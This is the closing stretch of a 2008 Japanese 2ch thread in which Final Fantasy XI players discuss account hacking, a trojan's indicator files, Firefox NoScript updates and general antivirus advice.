>広告が汚染された可能性もあるという。現時点でクリップボードを上書きしている悪質なURLは2種類あり、
>いずれも被害者のマシンで偽のシステムスキャンを実行するサイトへつながるとSophosは伝えている。

http://headlines.yahoo.co.jp/hl?a=20080820-00000042-zdn_ep-sci
954既にその名前は使われています:2008/08/20(水) 15:02:33 ID:v9YB+1nT
ついでにNo Script 1.7.9がきたよあげ
955既にその名前は使われています:2008/08/20(水) 15:24:35 ID:rFdRuFlp
とりあえず、解約した。実害鯖移動の料金。
明日警察に被害届出す予定。

KcrnaeghDrv.dllってのあるか調べた方がいいよ。
これでやられた。どこで感染したのか分からない。
956既にその名前は使われています:2008/08/20(水) 15:31:50 ID:GLRsnmCy
ウイルスやスパイウェアのカテゴリ

Type Trojanタイプトロイの木馬

Troj/Lineag-DY is a Trojan for the Windows platform. ) Troj / lineag - dyは、トロイの木馬は、 Windowsプラットフォームです。

When Troj/Lineag-DY is installed the following files are created:時) Troj / lineag - dyがインストールさは、以下のファイルが作成されます:

<Current Folder>\das.bat <currentフォルダ> \ das.bat
<System>\KcrnaeghDrv.dll <system> \ kcrnaeghdrv.dll

The file KarnaeghDrv.dll is also detected as Troj/Lineag-DY.ファイルとして検出さもkarnaeghdrv.dll ) Troj / lineag - dyです。

The Trojan also may delete the Windows HOSTS file.このトロイの木馬Windowsのhostsファイルを削除しても5月です。
957既にその名前は使われています:2008/08/20(水) 15:32:50 ID:msQxatJ+
No.Script1.7.9更新アゲ

・・・どうやって更新すんのか四苦八苦中ヽ(;´ω`)ノ
958既にその名前は使われています:2008/08/20(水) 15:32:55 ID:GLRsnmCy
翻訳して拾ったのはご愛嬌だが、これかな?
959既にその名前は使われています:2008/08/20(水) 15:38:42 ID:jc0scvPp
>>957
「ツール」>「オプション」>「一般」のところの「アドオンを管理」
>「更新を確認」ボタン(左下にあります)>Firefoxを立ち上げ直し

で、1.7.9になります
960既にその名前は使われています:2008/08/20(水) 15:57:42 ID:jc0scvPp
>>957
いけない、ひとつ抜けてたけど大丈夫だったかな

「ツール」>「オプション」>「一般」のところの「アドオンを管理」
>「アドオン」のところの「拡張機能」>「更新を確認」ボタン(左下にあります)
>Firefoxを立ち上げ直しで更新が反映されます

「アドオン」の窓の「拡張機能」が抜けてました
961既にその名前は使われています:2008/08/20(水) 18:00:19 ID:d2NLdkWv
Firefox 3のSSL証明書ポリシー変更で閲覧不能サイト増加の可能性
http://internet.watch.impress.co.jp/cda/news/2008/08/20/20607.html
962既にその名前は使われています:2008/08/20(水) 18:33:59 ID:2thKb8D1
>>960
俺も更新知ってやろうかと思ったんですが、
「一般」の所にアドオン関係ないな、、、もしかしてFirefox3かな?


以前ちょっとだけ3にしたけど何か慣れなくて前のに戻したけど
セキュリテー的には3のほうがいいのかな
963既にその名前は使われています:2008/08/20(水) 18:36:01 ID:cmw/bcHU
テー
964既にその名前は使われています:2008/08/20(水) 18:37:38 ID:JSmF4rEC
あー俺もセキュリてー
965既にその名前は使われています:2008/08/20(水) 19:05:24 ID:jc0scvPp
>>962
わたしのはFirefox3です
2を使ってた期間がすごく短いので、2と3の違いがほとんどわかりません
ブラウザの更新はセキュリティの基本だと教わりましたので、みなさんも
3を使われているものと思ってお話してましたm(_ _)m
966既にその名前は使われています:2008/08/20(水) 19:06:11 ID:RQzjwDNs
心配性なのですが、相談に乗ってもらいたいです。

2日に1度恒例で行ってるノートンのスキャンを行い仕事に行き、
帰ってくると、スキャンは完了してたのですが、ノートン自身に問題が確認されましたって出てて、
修復するも、完了手前で「応答なし」状態になり、強制終了させて、再度アップデートとスキャンを行い、
特に問題も無く完了し、

POLログイン時にPOL-0019、サーバーが見つかりませんてのが出て、リトライすると正常にログイン出来たのですが、
有志さんたちのブログ等で「ログイン時にエラーが発生する」など見たことがあり、すごい心配になって
一先ずLANぶっこ抜いて、レジストリが書き換えられてないか、system32にある例のファイルが無いか等確認して、
特に問題点も見つからず、
もう一度POLにログインしようとすると、また同じPOL-0019が出て、リトライで問題なくログインできました。

ファイヤーウォールやライブアップデート等のセキュリティは最新を維持するようにしてます、
WEBブラウザはOperaを使ってます。

これは単なるサーバーエラーだけなのでしょうか・・・?
このご時勢、ちょっとしたエラーが心配なので・・・
967既にその名前は使われています:2008/08/20(水) 19:08:04 ID:l3MFw8WH
Firefox2なら

ツール>アドオンでNoScriptのとこクリックして
窓の左下にある”更新を確認”押せばOK
968既にその名前は使われています:2008/08/20(水) 19:09:12 ID:2thKb8D1
>>965
やっぱり3のほうでしたか。ありがとうございます。
更新されてるなら自分もちょっと見てみよう
969既にその名前は使われています:2008/08/20(水) 19:09:50 ID:KdlX0Si2
ジョブの調整について (2008/08/20)

次回バージョンアップでは、からくり士を始めとしていくつかの追加・調整を予定しています。

詳しくは『こちら』をご覧ください。

http://www.playonline.com/pcd/topics/ff11/detail/3578/detail.html
970既にその名前は使われています:2008/08/20(水) 19:10:35 ID:2zIppzDc
>>966
まずはググる
それでもわからなければクリーンインストール
もし抜かれてるならケーブルぶっこぬいた所で意味なしじゃね?
971既にその名前は使われています:2008/08/20(水) 19:11:19 ID:2thKb8D1
>>967
あ、更新できました! ありがとうございます
972既にその名前は使われています:2008/08/20(水) 19:25:49 ID:GwT9rzgL
>>950
マジレスすると純正厨なんでFFでツールは一切使ってない。

あと、ウィルス対策ソフトもガッチガチに使ってる。
なのに垢ハックされるんですが(´Д⊂)
もうこれは運なのか・・・そうなのか・・・。
973既にその名前は使われています:2008/08/20(水) 19:29:38 ID:PxSJC9wH
>>972
そういう人こそ、環境を教えて欲しい。
974既にその名前は使われています:2008/08/20(水) 19:49:31 ID:SRPOCrWK
うめついでに fx3.0.1でも ツール>アドオン
上の4つのアイコンから 拡張機能 を選ぶと 今入ってるアドオンの一覧が出て
ウィンドウ左下の「更新を確認」で 更新があればそこからインストールできますよん。

ID:GwT9rzgLは アカハック被害者さんですか?
>マジレスすると純正厨なんでFFでツールは一切使ってない。
>あと、ウィルス対策ソフトもガッチガチに使ってる。
とのこと もしテンプレで報告済みでしたら スレとレス番教えていただけませんか?
報告なさってないようでしたら 973氏の言うように
次スレのほうでご報告をお願いします。
次スレ
●● RMT業者の垢ハックが多発している件37 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219176652/
975既にその名前は使われています:2008/08/20(水) 19:52:07 ID:qV4vkOct
むしろツーラーの方がきちんと対策していると思われる。
976既にその名前は使われています:2008/08/20(水) 19:58:31 ID:LUiY7/XY
さあ鬼(>>972)の首をとるゲームが始まったw
977既にその名前は使われています:2008/08/20(水) 20:40:15 ID:jc0scvPp
>>972
FlashPlayerのバージョンを教えてください
バージョンテストはテンプレ(>>12の8)にあります
978既にその名前は使われています:2008/08/20(水) 20:41:34 ID:msQxatJ+
>>959
うおおおおおありがとう!できた!
979既にその名前は使われています:2008/08/20(水) 20:46:17 ID:jc0scvPp
>>978
いえいえ(*^^*ゞ

というか「ツール」>「アドオン」の「拡張機能」>「更新を確認」の方法を
知らなくて、ややこしい説明になってました、ごめんなさいm(_ _)m

「ツール」>「オプション」に行く前に気が付けと・・・>わたし
980既にその名前は使われています:2008/08/20(水) 22:37:41 ID:ER4+mSMT
どんな対応策とってたかってのもあるが
「これだけやってるから大丈夫^^」って思うのが一番危ないんじゃないのか。

中国製アンチウィルスwとかマカフィーでがちがちにかためてました、とかそういうオチか?
981既にその名前は使われています:2008/08/20(水) 22:42:53 ID:HU9f2PUA
質問です。PCやネット環境の対策とは別として(ここでいろいろ言われてるので)
変なものググらない。のと、FFのアドはこまめに変更する
ってのは効果あると思いますか?ご意見ください
982既にその名前は使われています:2008/08/20(水) 22:43:31 ID:HU9f2PUA
FFのパスでした・・・orz
983既にその名前は使われています:2008/08/20(水) 22:52:13 ID:eoZuZs1Z
変なものはググらない?HPごと改竄されるのに?
984既にその名前は使われています:2008/08/20(水) 22:56:39 ID:ynd2wi9S
「変なもの」に何が含まれるか分からないけど
FFの攻略情報をググるつもりなら変なものより危ないかも(FFに関しては)
ウイルスが侵入してしまったら、それを取り除かない限りパスの変更も効果が無いけど
健全な環境で普段からパスをちょくちょく変えるのは、予防として悪いことじゃないと思う
985既にその名前は使われています:2008/08/20(水) 22:57:05 ID:HU9f2PUA
>>983
HPそのものにウィルスついてるって事でしょうか?
986既にその名前は使われています:2008/08/20(水) 22:58:34 ID:6FDtoe8J
981みたいなこと言ってる時点でヤバそうなのが俺にもわかるわw
最近よくこのスレで見る釣りだかマジだか良く分からん自称初心者と同じ人か?
987既にその名前は使われています:2008/08/20(水) 22:59:01 ID:jc0scvPp
>>981
わたしも>>984さんに同意ですね

というか、ウィルスに感染する仕組みをちゃんと理解できていれば
前もって対策を取ることができるはずですから、検索したサイトに
行くことがすなわち危険であるとも言えない部分もあります

いまいちばん怖いのは、安全だと思って行ったサイトでウィルスに
感染することなのかもしれません
988既にその名前は使われています:2008/08/20(水) 22:59:35 ID:6FDtoe8J
>HPそのものにウィルスついてるって事でしょうか?

このスレ読んでねえじゃん・・・
989既にその名前は使われています:2008/08/20(水) 23:00:39 ID:HU9f2PUA
>>984
変なのも=FF関連のサイトってことです。
そうですか、見るサイトも ある程度決めといたほうがいいか・・。
990既にその名前は使われています:2008/08/20(水) 23:02:14 ID:jc0scvPp
>>989
>見るサイトも ある程度決めといたほうがいいか・・。

違います

ウィルスを拾わない環境でネットしてください
ある程度決めたサイトがいつも安全だとは限りません
991既にその名前は使われています:2008/08/20(水) 23:03:19 ID:xuZXXDsR
とりあえずテンプレにあるこの初心者用のサイトを一生懸命読んでくれ。
tp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

もはやどのサイトも安全って事は無いんだ。
怖いならFFで使わないPCでぐぐってくれ。
992既にその名前は使われています:2008/08/20(水) 23:04:17 ID:JwQj/c2U
FF11が最大のウイルスでした。
ウィルスとウイルス
君ならどっち?
993既にその名前は使われています:2008/08/20(水) 23:07:41 ID:ETLZZMwk
>>992
むしろユーザがウィルスでしたって話だけどなw
994既にその名前は使われています:2008/08/20(水) 23:09:54 ID:jc0scvPp
>>992
ういるす(ラテン語) が正しいっぽいですね・・・w

うぃるす で辞書検索しても ういるす に当たります

もう びーるす(ドイツ語) でいいじゃん・・・w
995既にその名前は使われています:2008/08/20(水) 23:55:20 ID:GWG/Z4YK
ブルースウィリス?ウィルス?新聞やTVジョン等で記載が違うの不思議!
って・・・失礼・・・
996既にその名前は使われています:2008/08/21(木) 00:01:58 ID:ki1aPwBG
うめちゃうにゃ
997既にその名前は使われています:2008/08/21(木) 00:02:47 ID:ki1aPwBG
うめちゃうにゃ
998既にその名前は使われています:2008/08/21(木) 00:03:25 ID:ki1aPwBG
うめるのにゃ
999既にその名前は使われています:2008/08/21(木) 00:03:59 ID:ki1aPwBG
てか 思考停止してる人多すぎると思うにゃ
1000既にその名前は使われています:2008/08/21(木) 00:04:30 ID:ki1aPwBG
! かんじはよめないにゃ
10011001
  === Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪